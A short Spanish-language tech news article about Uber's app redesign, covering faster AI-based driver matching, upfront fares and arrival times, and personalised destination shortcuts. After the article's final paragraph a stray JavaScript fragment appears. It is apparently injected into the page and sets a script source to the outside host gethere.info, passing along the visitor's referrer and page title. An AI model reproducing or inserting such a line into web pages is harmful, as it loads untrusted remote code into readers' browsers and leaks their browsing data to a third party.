Uber cambia su interfaz y ahora es más simple y rápido

La app pretende ayudar a sus usuarios gracias a implementar mejoras en su inteligencia artificial.

Uber @Uber anunció en su cuenta en Twitter que, después de casi 4 años de su última gran actualización, realizó una enorme renovación de su aplicación móvil, que pretende ser más simple de usar.

“Uber quiere recuperar la simplicidad del 2010: apretar un botón y conseguir un viaje”, indicó Yuhki Yamashita, director de Productos de la compañía.

La nueva app ahora permite que los vehículos lleguen antes, gracias a una mejora sustancial de la inteligencia artificial que encuentra más rápido al auto más cerca del usuario. También mejoró las tecnologías que vinculan a los choferes con los usuarios. En cuanto a la interfaz, ahora se verá de inmediato la tarifa del viaje que se solicitó y la hora prevista de llegada. Además cuando el usuario entre a la app, Uber le preguntará directamente a dónde quiere ir.

Por si fuera poco también se podrán personalizar destinos específicos que visitamos constantemente, como nuestro restaurante favorito o la casa de un amigo, y la app por su cuenta solicitará al lugar o a nuestros contactos que proporcionen la dirección. El usuario podrá usar algunos “atajos” con botones personalizados prediciendo adónde es probable que quiera ir a partir de sus viajes anteriores.

Si quieres probar la nueva versión de Uber antes de que llegue a todos puedes hacerlo desde este enlace.

 

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas: